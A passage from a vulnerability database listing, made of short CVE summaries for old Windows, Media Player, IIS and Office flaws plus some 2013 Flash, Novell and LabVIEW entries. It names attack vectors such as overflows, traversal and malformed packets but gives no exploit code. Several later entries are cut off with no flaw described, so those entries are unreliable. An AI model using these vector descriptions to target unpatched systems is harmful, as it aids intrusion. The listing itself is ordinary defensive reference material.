(API) of Microsoft DirectPlay 7.0a thru 9.0b, as used in Windows Server 2003 and earlier allows remote attackers to cause a denial of service (application crash) via a malformed packet. [CVE-2004-0201] Heap-based buffer overflow in the HtmlHelp program (hh.exe) in HTML Help for Microsoft Windows 98, Me, NT 4.0, 2000, XP, and Server 2003 allows remote attackers to execute arbitrary commands via a .CHM file with a large length field, a different vulnerability than CVE-2003-1041. [CVE-2004-0199] Help and Support Center in Microsoft Windows XP and Windows Server 2003 SP1 does not properly validate HCP URLs, which allows remote attackers to execute arbitrary code, as demonstrated using certain hcp:// URLs that access the DVD Upgrade capability (dvdupgrd.htm). [CVE-2004-0124] The DCOM RPC interface for Microsoft Windows NT 4.0, 2000, XP, and Server 2003 allows remote attackers to cause network communications via an "alter context" call that contains additional data, aka the "Object Identity Vulnerability." [CVE-2004-0120] The Microsoft Secure Sockets Layer (SSL) library, as used in Windows 2000, Windows XP, and Windows Server 2003, allows remote attackers to cause a denial of service via malformed SSL messages. [CVE-2004-0116] An Activation function in the RPCSS Service involved with DCOM activation for Microsoft Windows 2000, XP, and 2003 allows remote attackers to cause a denial of service (memory consumption) via an activation request with a large length field. [CVE-2003-1107] The DHTML capability in Microsoft Windows Media Player (WMP) 6.4, 7.0, 7.1, and 9 may run certain URL commands from a security zone that is less trusted than the current zone, which allows attackers to bypass intended access restrictions. [CVE-2003-1106] The SMTP service in Microsoft Windows 2000 before SP4 allows remote attackers to cause a denial of service (crash or hang) via an e-mail message with a malformed time stamp in the FILETIME attribute. [CVE-2003-0908] The Utility Manager in Microsoft Windows 2000 executes winhlp32.exe with system privileges, which allows local users to execute arbitrary code via a "Shatter" style attack using a Windows message that accesses the context sensitive help button in the GUI, as demonstrated using the File Open dialog in the Help window, a different vulnerability than CVE-2004-0213. [CVE-2003-0907] Help and Support Center in Microsoft Windows XP SP1 does not properly validate HCP URLs, which allows remote attackers to execute arbitrary code via quotation marks in an hcp:// URL, which are not quoted when constructing the argument list to HelpCtr.exe. [CVE-2003-0906] Buffer overflow in the rendering for (1) Windows Metafile (WMF) or (2) Enhanced Metafile (EMF) image formats in Microsoft Windows NT 4.0 SP6a, 2000 SP2 through SP4, and XP SP1 allows remote attackers to execute arbitrary code via a malformed WMF or EMF image. [CVE-2003-0839] Directory traversal vulnerability in the "Shell Folders" capability in Microsoft Windows Server 2003 allows remote attackers to read arbitrary files via .. (dot dot) sequences in a "shell:" link. [CVE-2003-0825] The Windows Internet Naming Service (WINS) for Microsoft Windows Server 2003, and possibly Windows NT and Server 2000, does not properly validate the length of certain packets, which allows attackers to cause a denial of service and possibly execute arbitrary code. [CVE-2003-0818] Multiple integer overflows in Microsoft ASN.1 library (MSASN1.DLL), as used in LSASS.EXE, CRYPT32.DLL, and other Microsoft executables and libraries on Windows NT 4.0, 2000, and XP, allow remote attackers to execute arbitrary code via ASN.1 BER encodings with (1) very large length fields that cause arbitrary heap data to be overwritten, or (2) modified bit strings. [CVE-2003-0807] Buffer overflow in the COM Internet Services and in the RPC over HTTP Proxy components for Microsoft Windows NT Server 4.0, NT 4.0 Terminal Server Edition, 2000, XP, and Server 2003 allows remote attackers to cause a denial of service via a crafted request. [CVE-2003-0806] Buffer overflow in the Windows logon process (winlogon) in Microsoft Windows NT 4.0 SP6a, 2000 SP2 through SP4, and XP SP1, when a member of a domain, allows remote attackers to execute arbitrary code. [CVE-2003-0719] Buffer overflow in the Private Communications Transport (PCT) protocol implementation in the Microsoft SSL library, as used in Microsoft Windows NT 4.0 SP6a, 2000 SP2 through SP4, XP SP1, Server 2003, NetMeeting, Windows 98, and Windows ME, allows remote attackers to execute arbitrary code via PCT 1.0 handshake packets. [CVE-2003-0662] Buffer overflow in Troubleshooter ActiveX Control (Tshoot.ocx) in Microsoft Windows 2000 SP4 and earlier allows remote attackers to execute arbitrary code via an HTML document with a long argument to the RunQuery2 method. [CVE-2003-0660] The Authenticode capability in Microsoft Windows NT through Server 2003 does not prompt the user to download and install ActiveX controls when the system is low on memory, which could allow remote attackers execute arbitrary code without user approval. [CVE-2003-0604] Windows Media Player (WMP) 7 and 8, as running on Internet Explorer and possibly other Microsoft products that process HTML, allows remote attackers to bypass zone restrictions and access or execute arbitrary files via an IFRAME tag pointing to an ASF file whose Content-location contains a File:// URL. [CVE-2003-0533] Stack-based buffer overflow in certain Active Directory service functions in LSASRV.DLL of the Local Security Authority Subsystem Service (LSASS) in Microsoft Windows NT 4.0 SP6a, 2000 SP2 through SP4, XP SP1, Server 2003, NetMeeting, Windows 98, and Windows ME, allows remote attackers to execute arbitrary code via a packet that causes the DsRolerUpgradeDownlevelServer function to create long debug entries for the DCPROMO.LOG log file, as exploited by the Sasser worm. [CVE-2003-0496] Microsoft SQL Server before Windows 2000 SP4 allows local users to gain privileges as the SQL Server user by calling the xp_fileexist extended stored procedure with a named pipe as an argument instead of a normal file. [CVE-2003-0352] Buffer overflow in a certain DCOM interface for RPC in Microsoft Windows NT 4.0, 2000, XP, and Server 2003 allows remote attackers to execute arbitrary code via a malformed message, as exploited by the Blaster/MSblast/LovSAN and Nachi/Welchia worms. [CVE-2003-0349] Buffer overflow in the streaming media component for logging multicast requests in the ISAPI for the logging capability of Microsoft Windows Media Services (nsiislog.dll), as installed in IIS 5.0, allows remote attackers to execute arbitrary code via a large POST request to nsiislog.dll. [CVE-2003-0348] A certain Microsoft Windows Media Player 9 Series ActiveX control allows remote attackers to view and manipulate the Media Library on the local system via HTML script. [CVE-2003-0346] Multiple integer overflows in a Microsoft Windows DirectX MIDI library (QUARTZ.DLL) allow remote attackers to execute arbitrary code via a MIDI (.mid) file with (1) large length for a Text or Copyright string, or (2) a large number of tracks, which leads to a heap-based buffer overflow. [CVE-2003-0345] Buffer overflow in the SMB capability for Microsoft Windows XP, 2000, and NT allows remote attackers to cause a denial of service and possibly execute arbitrary code via an SMB packet that specifies a smaller buffer length than is required. [CVE-2003-0228] Directory traversal vulnerability in Microsoft Windows Media Player 7.1 and Windows Media Player for Windows XP allows remote attackers to execute arbitrary code via a skins file with a URL containing hex-encoded backslash characters (%5C) that causes an executable to be placed in an arbitrary location. [CVE-2003-0227] The logging capability for unicast and multicast transmissions in the ISAPI extension for Microsoft Windows Media Services in Microsoft Windows NT 4.0 and 2000, nsiislog.dll, allows remote attackers to cause a denial of service in Internet Information Server (IIS) and execute arbitrary code via a certain network request. [CVE-2003-0111] The ByteCode Verifier component of Microsoft Virtual Machine (VM) build 5.0.3809 and earlier, as used in Windows and Internet Explorer, allows remote attackers to bypass security checks and execute arbitrary code via a malicious Java applet, aka "Flaw in Microsoft VM Could Enable System Compromise." [CVE-2003-0109] Buffer overflow in ntdll.dll on Microsoft Windows NT 4.0, Windows NT 4.0 Terminal Server Edition, Windows 2000, and Windows XP allows remote attackers to execute arbitrary code, as demonstrated via a WebDAV request to IIS 5.0. [CVE-2003-0009] Cross-site scripting (XSS) vulnerability in Help and Support Center for Microsoft Windows Me allows remote attackers to execute arbitrary script in the Local Computer security context via an hcp:// URL with the malicious script in the topic parameter. [CVE-2003-0004] Buffer overflow in the Windows Redirector function in Microsoft Windows XP allows local users to execute arbitrary code via a long parameter. [CVE-2003-0003] Buffer overflow in the RPC Locator service for Microsoft Windows NT 4.0, Windows NT 4.0 Terminal Server Edition, Windows 2000, and Windows XP allows local users to execute arbitrary code via an RPC call to the service containing certain parameter information. [CVE-2002-2283] Microsoft Windows XP with Fast User Switching (FUS) enabled does not remove the "show processes from all users" privilege when the user is removed from the administrator group, which allows that user to view prosesses of other users. [CVE-2002-2117] Microsoft Windows XP allows remote attackers to cause a denial of service (CPU consumption) by flooding UDP port 500 (ISAKMP). [CVE-2002-2105] Microsoft Windows XP allows local users to prevent the system from booting via a corrupt explorer.exe.manifest file. [CVE-2002-2073] Cross-site scripting (XSS) vulnerability in the default ASP pages on Microsoft Site Server 3.0 on Windows NT 4.0 allows remote attackers to inject arbitrary web script or HTML via the (1) ctr parameter in Default.asp and (2) the query string to formslogin.asp. [CVE-2002-1984] Microsoft Internet Explorer 5.0.1 through 6.0 on Windows 2000 or Windows XP allows remote attackers to cause a denial of service (crash) via an OBJECT tag that contains a crafted CLASSID (CLSID) value of "CLSID:00022613-0000-0000-C000-000000000046". [CVE-2002-1933] The terminal services screensaver for Microsoft Windows 2000 does not automatically lock the terminal window if the window is minimized, which could allow local users to gain access to the terminal server window. [CVE-2002-1932] Microsoft Windows XP and Windows 2000, when configured to send administrative alerts and the "Do not overwrite events (clear log manually)" option is set, does not notify the administrator when the log reaches its maximum size, which allows local users and remote attackers to avoid detection. [CVE-2002-1847] Buffer overflow in mplay32.exe of Microsoft Windows Media Player (WMP) 6.3 through 7.1 allows remote attackers to execute arbitrary commands via a long mp3 filename command line argument. NOTE: since the only known attack vector requires command line access, this may not be a vulnerability. [CVE-2002-1844] Microsoft Windows Media Player (WMP) 6.3, when installed on Solaris, installs executables with world-writable permissions, which allows local users to delete or modify the executables to gain privileges. [CVE-2002-1712] Microsoft Windows 2000 allows remote attackers to cause a denial of service (memory consumption) by sending a flood of empty TCP/IP packets with the ACK and FIN bits set to the NetBIOS port (TCP/139), as demonstrated by stream3. [CVE-2002-1692] Buffer overflow in backup utility of Microsoft Windows 95 allows attackers to execute arbitrary code by causing a filename with a long extension to be placed in a folder to be backed up. [CVE-2002-1670] Microsoft Windows XP Professional upgrade edition overwrites previously installed patches for Internet Explorer 6.0, leaving Internet Explorer unpatched. [CVE-2002-1327] Buffer overflow in the Windows Shell function in Microsoft Windows XP allows remote attackers to execute arbitrary code via an .MP3 or .WMA audio file with a corrupt custom attribute, aka "Unchecked Buffer in Windows Shell Could Enable System Compromise." [CVE-2002-1256] The SMB signing capability in the Server Message Block (SMB) protocol in Microsoft Windows 2000 and Windows XP allows attackers to disable the digital signing settings in an SMB session to force the data to be sent unsigned, then inject data into the session without detection, e.g. by modifying group policy information sent from a domain controller. [CVE-2002-1214] Buffer overflow in Microsoft PPTP Service on Windows XP and Windows 2000 allows remote attackers to cause a denial of service (hang) and possibly execute arbitrary code via a certain PPTP packet with malformed control data. [CVE-2002-1184] The system root folder of Microsoft Windows 2000 has default permissions of Everyone group with Full access (Everyone:F) and is in the search path when locating programs during login or application launch from the desktop, which could allow attackers to gain privileges as other users via Trojan horse programs. [CVE-2002-1183] Microsoft Windows 98 and Windows NT 4.0 do not properly verify the Basic Constraints of digital certificates, allowing remote attackers to execute code, aka "New Variant of Certificate Validation Flaw Could Enable Identity Spoofing" (CAN-2002-0862). [CVE-2002-1141] An input validation error in the Sun Microsystems RPC library Services for Unix 3.0 Interix SD, as implemented on Microsoft Windows NT4, 2000, and XP, allows remote attackers to cause a denial of service via malformed fragmented RPC client packets, aka "Denial of service by sending an invalid RPC request." [CVE-2002-1140] The Sun Microsystems RPC library Services for Unix 3.0 Interix SD, as implemented on Microsoft Windows NT4, 2000, and XP, allows remote attackers to cause a denial of service (service hang) via malformed packet fragments, aka "Improper parameter size check leading to denial of service." [CVE-2002-1139] The Compressed Folders feature in Microsoft Windows 98 with Plus! Pack, Windows Me, and Windows XP does not properly check the destination folder during the decompression of ZIP files, which allows attackers to place an executable file in a known location on a user's system, aka "Incorrect Target Path for Zipped File Decompression." [CVE-2002-0864] The Remote Data Protocol (RDP) version 5.1 in Microsoft Windows XP allows remote attackers to cause a denial of service (crash) when Remote Desktop is enabled via a PDU Confirm Active data packet that does not set the Pattern BLT command, aka "Denial of Service in Remote Desktop." [CVE-2002-0863] Remote Data Protocol (RDP) version 5.0 in Microsoft Windows 2000 and RDP 5.1 in Windows XP does not encrypt the checksums of plaintext session data, which could allow a remote attacker to determine the contents of encrypted sessions via sniffing, aka "Weak Encryption in RDP Protocol." [CVE-2002-0862] The (1) CertGetCertificateChain, (2) CertVerifyCertificateChainPolicy, and (3) WinVerifyTrust APIs within the CryptoAPI for Microsoft products including Microsoft Windows 98 through XP, Office for Mac, Internet Explorer for Mac, and Outlook Express for Mac, do not properly verify the Basic Constraints of intermediate CA-signed X.509 certificates, which allows remote attackers to spoof the certificates of trusted sites via a man-in-the-middle attack for SSL sessions, as originally reported for Internet Explorer and IIS. [CVE-2002-0724] Buffer overflow in SMB (Server Message Block) protocol in Microsoft Windows NT, Windows 2000, and Windows XP allows attackers to cause a denial of service (crash) via a SMB_COM_TRANSACTION packet with a request for the (1) NetShareEnum, (2) NetServerEnum2, or (3) NetServerEnum3, aka "Unchecked Buffer in Network Share Provider Can Lead to Denial of Service". [CVE-2002-0699] Unknown vulnerability in the Certificate Enrollment ActiveX Control in Microsoft Windows 98, Windows 98 Second Edition, Windows Millennium, Windows NT 4.0, Windows 2000, and Windows XP allow remote attackers to delete digital certificates on a user's system via HTML. [CVE-2002-0694] The HTML Help facility in Microsoft Windows 98, 98 Second Edition, Millennium Edition, NT 4.0, NT 4.0 Terminal Server Edition, Windows 2000, and Windows XP uses the Local Computer Security Zone when opening .chm files from the Temporary Internet Files folder, which allows remote attackers to execute arbitrary code via HTML mail that references or inserts a malicious .chm file containing shortcuts that can be executed, aka "Code Execution via Compiled HTML Help File." [CVE-2002-0693] Buffer overflow in the HTML Help ActiveX Control (hhctrl.ocx) in Microsoft Windows 98, 98 Second Edition, Millennium Edition, NT 4.0, NT 4.0 Terminal Server Edition, Windows 2000, and Windows XP allows remote attackers to execute code via (1) a long parameter to the Alink function, or (2) script containing a long argument to the showHelp function. [CVE-2002-0619] The Mail Merge Tool in Microsoft Word 2002 for Windows, when Microsoft Access is present on a system, allows remote attackers to execute Visual Basic (VBA) scripts within a mail merge document that is saved in HTML format, aka a "Variant of MS00-071, Word Mail Merge Vulnerability" (CVE-2000-0788). [CVE-2002-0618] The Macro Security Model in Microsoft Excel 2000 and 2002 for Windows allows remote attackers to execute code in the Local Computer zone by embedding HTML scripts within an Excel workbook that contains an XSL stylesheet, aka "Excel XSL Stylesheet Script Execution". [CVE-2002-0617] The Macro Security Model in Microsoft Excel 2000 and 2002 for Windows allows remote attackers to execute code by creating a hyperlink on a drawing shape in a source workbook that points to a destination workbook containing an autoexecute macro, aka "Hyperlinked Excel Workbook Macro Bypass." [CVE-2002-0616] The Macro Security Model in Microsoft Excel 2000 and 2002 for Windows allows remote attackers to execute code by attaching an inline macro to an object within an Excel workbook, aka the "Excel Inline Macros Vulnerability." [CVE-2002-0615] The Windows Media Active Playlist in Microsoft Windows Media Player 7.1 stores information in a well known location on the local file system, allowing attackers to execute HTML scripts in the Local Computer zone, aka "Media Playback Script Invocation". [CVE-2002-0597] LANMAN service on Microsoft Windows 2000 allows remote attackers to cause a denial of service (CPU/memory exhaustion) via a stream of malformed data to microsoft-ds port 445. [CVE-2002-0444] Microsoft Windows 2000 running the Terminal Server 90-day trial version, and possibly other versions, does not apply group policies to incoming users when the number of connections to the SYSVOL share exceeds the maximum, e.g. with a maximum number of licenses, which can allow remote authenticated users to bypass group policies. [CVE-2002-0443] Microsoft Windows 2000 allows local users to bypass the policy that prohibits reusing old passwords by changing the current password before it expires, which does not enable the check for previous passwords. [CVE-2002-0373] The Windows Media Device Manager (WMDM) Service in Microsoft Windows Media Player 7.1 on Windows 2000 systems allows local users to obtain LocalSystem rights via a program that calls the WMDM service to connect to an invalid local storage device, aka "Privilege Elevation through Windows Media Device Manager Service". [CVE-2002-0372] Microsoft Windows Media Player versions 6.4 and 7.1 and Media Player for Windows XP allow remote attackers to bypass Internet Explorer's (IE) security mechanisms and run code via an executable .wma media file with a license installation requirement stored in the IE cache, aka the "Cache Path Disclosure via Windows Media Player". [CVE-2002-0370] Buffer overflow in the ZIP capability for multiple products allows remote attackers to cause a denial of service or execute arbitrary code via ZIP files containing entries with long filenames, including (1) Microsoft Windows 98 with Plus! Pack, (2) Windows XP, (3) Windows ME, (4) Lotus Notes R4 through R6 (pre-gold), (5) Verity KeyView, and (6) Stuffit Expander before 7.0. [CVE-2002-0224] The MSDTC (Microsoft Distributed Transaction Service Coordinator) for Microsoft Windows 2000, Microsoft IIS 5.0 and SQL Server 6.5 through SQL 2000 0.0 allows remote attackers to cause a denial of service (crash or hang) via malformed (random) input. [CVE-2002-0151] Buffer overflow in Multiple UNC Provider (MUP) in Microsoft Windows operating systems allows local users to cause a denial of service or possibly gain SYSTEM privileges via a long UNC request. [CVE-2002-0136] Microsoft Internet Explorer 5.5 on Windows 98 allows remote web pages to cause a denial of service (hang) via extremely long values for form fields such as INPUT and TEXTAREA, which can be automatically filled via Javascript. [CVE-2002-0055] SMTP service in Microsoft Windows 2000, Windows XP Professional, and Exchange 2000 allows remote attackers to cause a denial of service via a command with a malformed data transfer (BDAT) request. [CVE-2002-0054] SMTP service in (1) Microsoft Windows 2000 and (2) Internet Mail Connector (IMC) in Exchange Server 5.5 does not properly handle responses to NTLM authentication, which allows remote attackers to perform mail relaying via an SMTP AUTH command using null session credentials. [CVE-2002-0034] The Microsoft CONVERT.EXE program, when used on Windows 2000 and Windows XP systems, does not apply the default NTFS permissions when converting a FAT32 file system, which could cause the conversion to produce a file system with less secure permissions than expected. [CVE-2002-0018] In Microsoft Windows NT and Windows 2000, a trusting domain that receives authorization information from a trusted domain does not verify that the trusted domain is authoritative for all listed SIDs, which allows remote attackers to gain Domain Administrator privileges on the trusting domain by injecting SIDs from untrusted domains into the authorization data that comes from from the trusted domain. [CVE-2001-1451] Memory leak in the SNMP LAN Manager (LANMAN) MIB extension for Microsoft Windows 2000 before SP3, when the Print Spooler is not running, allows remote attackers to cause a denial of service (memory consumption) via a large number of GET or GETNEXT requests. [CVE-2001-1200] Microsoft Windows XP allows local users to bypass a locked screen and run certain programs that are associated with Hot Keys. [CVE-2001-1055] The Microsoft Windows network stack allows remote attackers to cause a denial of service (CPU consumption) via a flood of malformed ARP request packets with random source IP and MAC addresses, as demonstrated by ARPNuke. [CVE-2001-0909] Buffer overflow in helpctr.exe program in Microsoft Help Center for Windows XP allows remote attackers to execute arbitrary code via a long hcp: URL. [CVE-2001-0719] Buffer overflow in Microsoft Windows Media Player 6.4 allows remote attackers to execute arbitrary code via a malformed Advanced Streaming Format (ASF) file. [CVE-2001-0541] Buffer overflow in Microsoft Windows Media Player 7.1 and earlier allows remote attackers to execute arbitrary commands via a malformed Windows Media Station (.NSC) file. [CVE-2001-0509] Vulnerabilities in RPC servers in (1) Microsoft Exchange Server 2000 and earlier, (2) Microsoft SQL Server 2000 and earlier, (3) Windows NT 4.0, and (4) Windows 2000 allow remote attackers to cause a denial of service via malformed inputs. [CVE-2001-0504] Vulnerability in authentication process for SMTP service in Microsoft Windows 2000 allows remote attackers to use incorrect credentials to gain privileges and conduct activites such as mail relaying. [CVE-2001-0351] Microsoft Windows 2000 telnet service allows a local user to make a certain system call that allows the user to terminate a Telnet session and cause a denial of service. [CVE-2001-0350] Microsoft Windows 2000 telnet service creates named pipes with predictable names and does not properly verify them, which allows local users to execute arbitrary commands by creating a named pipe with the predictable name and associating a malicious program with it, the second of two variants of this vulnerability. [CVE-2001-0349] Microsoft Windows 2000 telnet service creates named pipes with predictable names and does not properly verify them, which allows local users to execute arbitrary commands by creating a named pipe with the predictable name and associating a malicious program with it, the first of two variants of this vulnerability. [CVE-2001-0348] Microsoft Windows 2000 telnet service allows attackers to cause a denial of service (crash) via a long logon command that contains a backspace. [CVE-2001-0347] Information disclosure vulnerability in Microsoft Windows 2000 telnet service allows remote attackers to determine the existence of user accounts such as Guest, or log in to the server without specifying the domain name, via a malformed userid. [CVE-2001-0346] Handle leak in Microsoft Windows 2000 telnet service allows attackers to cause a denial of service by starting a large number of sessions and terminating them. [CVE-2001-0345] Microsoft Windows 2000 telnet service allows attackers to prevent idle Telnet sessions from timing out, causing a denial of service by creating a large number of idle sessions. [CVE-2001-0261] Microsoft Windows 2000 Encrypted File System does not properly destroy backups of files that are encrypted, which allows a local attacker to recover the text of encrypted files. [CVE-2001-0245] Microsoft Index Server 2.0 in Windows NT 4.0, and Indexing Service in Windows 2000, allows remote attackers to read server-side include files via a malformed search request, aka a new variant of the "Malformed Hit-Highlighting" vulnerability. [CVE-2001-0242] Buffer overflows in Microsoft Windows Media Player 7 and earlier allow remote attackers to execute arbitrary commands via (1) a long version tag in an .ASX file, or (2) a long banner tag, a variant of the ".ASX Buffer Overrun" vulnerability as discussed in MS:MS00-090. [CVE-2001-0047] The default permissions for the MTS Package Administration registry key in Windows NT 4.0 allows local users to install or modify arbitrary Microsoft Transaction Server (MTS) packages and gain privileges, aka one of the "Registry Permissions" vulnerabilities. [CVE-2001-0003] Web Extender Client (WEC) in Microsoft Office 2000, Windows 2000, and Windows Me does not properly process Internet Explorer security settings for NTLM authentication, which allows attackers to obtain NTLM credentials and possibly obtain the password, aka the "Web Client NTLM Authentication" vulnerability. [CVE-2000-1218] The default configuration for the domain name resolver for Microsoft Windows 98, NT 4.0, 2000, and XP sets the QueryIpMatching parameter to 0, which causes Windows to accept DNS updates from hosts that it did not query, which allows remote attackers to poison the DNS cache. [CVE-2000-1217] Microsoft Windows 2000 before Service Pack 2 (SP2), when running in a non-Windows 2000 domain and using NTLM authentication, and when credentials of an account are locally cached, allows local users to bypass account lockout policies and make an unlimited number of login attempts, aka the "Domain Account Lockout" vulnerability. [CVE-2000-1113] Buffer overflow in Microsoft Windows Media Player allows remote attackers to execute arbitrary commands via a malformed Active Stream Redirector (.ASX) file, aka the ".ASX Buffer Overrun" vulnerability. [CVE-2000-1112] Microsoft Windows Media Player 7 executes scripts in custom skin (.WMS) files, which could allow remote attackers to gain privileges via a skin that contains a malicious script, aka the ".WMS Script Execution" vulnerability. [CVE-2000-1079] Interactions between the CIFS Browser Protocol and NetBIOS as implemented in Microsoft Windows 95, 98, NT, and 2000 allow remote attackers to modify dynamic NetBIOS name cache entries via a spoofed Browse Frame Request in a unicast or UDP broadcast datagram. [CVE-2000-0942] The CiWebHitsFile component in Microsoft Indexing Services for Windows 2000 allows remote attackers to conduct a cross site scripting (CSS) attack via a CiRestriction parameter in a .htw request, aka the "Indexing Services Cross Site Scripting" vulnerability. [CVE-2000-0929] Microsoft Windows Media Player 7 allows attackers to cause a denial of service in RTF-enabled email clients via an embedded OCX control that is not closed properly, aka the "OCX Attachment" vulnerability. [CVE-2000-0858] Vulnerability in Microsoft Windows NT 4.0 allows remote attackers to cause a denial of service in IIS by sending it a series of malformed requests which cause INETINFO.EXE to fail, aka the "Invalid URL" vulnerability. [CVE-2000-0849] Race condition in Microsoft Windows Media server allows remote attackers to cause a denial of service in the Windows Media Unicast Service via a malformed request, aka the "Unicast Service Race Condition" vulnerability. [CVE-2000-0790] The web-based folder display capability in Microsoft Internet Explorer 5.5 on Windows 98 allows local users to insert Trojan horse programs by modifying the Folder.htt file and using the InvokeVerb method in the ShellDefView ActiveX control to specify a default execute option for the first file that is listed in the folder. [CVE-2000-0771] Microsoft Windows 2000 allows local users to cause a denial of service by corrupting the local security policy via malformed RPC traffic, aka the "Local Security Policy Corruption" vulnerability. [CVE-2000-0742] The IPX protocol implementation in Microsoft Windows 95 and 98 allows remote attackers to cause a denial of service by sending a ping packet with a source IP address that is a broadcast address, aka the "Malformed IPX Ping Packet" vulnerability. [CVE-2000-0653] Microsoft Outlook Express allows remote attackers to monitor a user's email by creating a persistent browser link to the Outlook Express windows, aka the "Persistent Mail-Browser Link" vulnerability. [CVE-2000-0495] Microsoft Windows Media Encoder allows remote attackers to cause a denial of service via a malformed request, aka the "Malformed Windows Media Encoder Request" vulnerability. [CVE-2000-0331] Buffer overflow in Microsoft command processor (CMD.EXE) for Windows NT and Windows 2000 allows a local user to cause a denial of service via a long environment variable, aka the "Malformed Environment Variable" vulnerability. [CVE-2000-0228] Microsoft Windows Media License Manager allows remote attackers to cause a denial of service by sending a malformed request that causes the manager to halt, aka the "Malformed Media License Request" Vulnerability. [CVE-2000-0216] Microsoft email clients in Outlook, Exchange, and Windows Messaging automatically respond to Read Receipt and Delivery Receipt tags, which could allow an attacker to flood a mail system with responses by forging a Read Receipt request that is redirected to a large distribution list. [CVE-2000-0168] Microsoft Windows 9x operating systems allow an attacker to cause a denial of service via a pathname that includes file device names, aka the "DOS Device in Path Name" vulnerability. [CVE-2000-0089] The rdisk utility in Microsoft Terminal Server Edition and Windows NT 4.0 stores registry hive information in a temporary file with permissions that allow local users to read it, aka the "RDISK Registry Enumeration File" vulnerability. [CVE-1999-1291] TCP/IP implementation in Microsoft Windows 95, Windows NT 4.0, and possibly others, allows remote attackers to reset connections by forcing a reset (RST) via a PSH ACK or other means, obtaining the target's last sequence number from the resulting packet, then spoofing a reset to the target. [CVE-1999-0749] Buffer overflow in Microsoft Telnet client in Windows 95 and Windows 98 via a malformed Telnet argument. [CVE-1999-0681] Buffer overflow in Microsoft FrontPage Server Extensions (PWS) 3.0.2.926 on Windows 95, and possibly other versions, allows remote attackers to cause a denial of service via a long URL. [CVE-1999-0386] Microsoft Personal Web Server and FrontPage Personal Web Server in some Windows systems allows a remote attacker to read files on the server by using a nonstandard URL. [CVE-1999-0288] The WINS server in Microsoft Windows NT 4.0 before SP4 allows remote attackers to cause a denial of service (process termination) via invalid UDP frames to port 137 (NETBIOS Name Service), as demonstrated via a flood of random packets. [CVE-1999-0012] Some web servers under Microsoft Windows allow remote attackers to bypass access restrictions for files with long file names. [CVE-2013-5025] Unspecified vulnerability in an ActiveX control in the Help subsystem in National Instruments LabWindows/CVI before 2013 has unknown impact and remote attack vectors. [CVE-2013-5023] Unspecified vulnerability in an ActiveX control in the HelpAsst component in NI Help Links in National Instruments LabWindows/CVI, LabVIEW, and other products has unknown impact and remote attack vectors. [CVE-2013-5022] Absolute path traversal vulnerability in the 3D Graph ActiveX control in cw3dgrph.ocx in National Instruments LabWindows/CVI, LabVIEW, and other products allows remote attackers to create and execute arbitrary files via a full pathname in an argument to the ExportStyle method. [CVE-2013-5021] Multiple absolute path traversal vulnerabilities in National Instruments cwui.ocx, as used in National Instruments LabWindows/CVI, National Instruments LabVIEW, the Data Analysis component in ABB DataManager 1 through 6.3.6, and other products allow remote attackers to create and execute arbitrary files via a full pathname in an argument to the ExportStyle method in the (1) CWNumEdit, (2) CWGraph, (3) CWBoolean, (4) CWSlide, or (5) CWKnob ActiveX control, in conjunction with file content in the (a) Caption or (b) FormatString property value. [CVE-2013-4669] FortiClient before 4.3.5.472 on Windows, before 4.0.3.134 on Mac OS X, and before 4.0 on Android [CVE-2013-4015] Microsoft Internet Explorer 6 through 10 allows local users to bypass the elevation policy check in the (1) Protected Mode or (2) Enhanced Protected Mode protection mechanism, and consequently gain privileges, by leveraging the ability to execute sandboxed code. [CVE-2013-3956] The NICM.SYS kernel driver 3.1.11.0 in Novell Client 4.91 SP5 on Windows XP and Windows Server 2003 [CVE-2013-3697] Integer overflow in the NWFS.SYS kernel driver 4.91.5.8 in Novell Client 4.91 SP5 on Windows XP and Windows Server 2003 and the NCPL.SYS kernel driver in Novell Client 2 SP2 on Windows Vista and Windows Server 2008 and Novell Client 2 SP3 on Windows Server 2008 R2, Windows 7, Windows 8, and Windows Server 2012 might allow local users to gain privileges via a crafted 0x1439EB IOCTL call. [CVE-2013-3393] The Precision Video Engine component in Cisco Jabber for Windows and Cisco Virtualization Experience Media Engine allows remote attackers to cause a denial of service (process crash and call disconnection) via crafted RTP packets, aka Bug IDs CSCuh60706 and CSCue21117. [CVE-2013-3347] Integer overflow in Adobe Flash Player before 11.7.700.232 and 11.8.x before 11.8.800.94 on Windows and Mac OS X, before 11.2.202.297 on Linux, before 11.1.111.64 on Android 2.x and 3.x, and before 11.1.115.69 on Android 4.x allows attackers to execute arbitrary code via PCM data that is not properly handled during resampling. [CVE-2013-3345] Adobe Flash Player before 11.7.700.232 and 11.8.x before 11.8.800.94 on Windows and Mac OS X, before 11.2.202.297 on Linux, before 11.1.111.64 on Android 2.x and 3.x, and before 11.1.115.69 on Android 4.x allows attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors. [CVE-2013-3344] Heap-based buffer overflow in Adobe Flash Player before 11.7.700.232 and 11.8.x before 11.8.800.94 on Windows and Mac OS X, before 11.2.202.297 on Linux, before 11.1.111.64 on Android 2.x and 3.x, and before 11.1.115.69 on Android 4.x allows attackers to execute arbitrary code via unspecified vectors. [CVE-2013-3343] Adobe Flash Player before 10.3.183.90 and 11.x before 11.7.700.224 on Windows, before 10.3.183.90 and 11.x before 11.7.700.225 on Mac OS X, before 10.3.183.90 and 11.x before 11.2.202.291 on Linux, before 11.1.111.59 on Android 2.x and 3.x, and before 11.1.115.63 on Android 4.x [CVE-2013-3335] Adobe Flash Player before 10.3.183.86 and 11.x before 11.7.700.202 on Windows and Mac OS X, before 10.3.183.86 and 11.x before 11.2.202.285 on Linux, before 11.1.111.54 on Android 2.x and 3.x, and before 11.1.115.58 on Android 4.x [CVE-2013-3334] Adobe Flash Player before 10.3.183.86 and 11.x before 11.7.700.202 on Windows and Mac OS X, before 10.3.183.86 and 11.x before 11.2.202.285 on Linux, before 11.1.111.54 on Android 2.x and 3.x, and before 11.1.115.58 on Android 4.x [CVE-2013-3333] Adobe Flash Player before 10.3.183.86 and 11.x before 11.7.700.202 on Windows and Mac OS X, before 10.3.183.86 and 11.x before 11.2.202.285 on Linux, before 11.1.111.54 on Android 2.x and 3.x, and before 11.1.115.58 on Android 4.x [CVE-2013-3332] Adobe Flash Player before 10.3.183.86 and 11.x before 11.7.700.202 on Windows and Mac OS X, before 10.3.183.86 and 11.x before 11.2.202.285 on Linux, before 11.1.111.54 on Android 2.x and 3.x, and before 11.1.115.58 on Android 4.x [CVE-2013-3331] Adobe Flash Player before 10.3.183.86 and 11.x before 11.7.700.202 on Windows and Mac OS X, before 10.3.183.86 and 11.x before 11.2.202.285 on Linux, before 11.1.111.54 on Android 2.x and 3.x, and before 11.1.115.58 on Android 4.x [CVE-2013-3330] Adobe Flash Player before 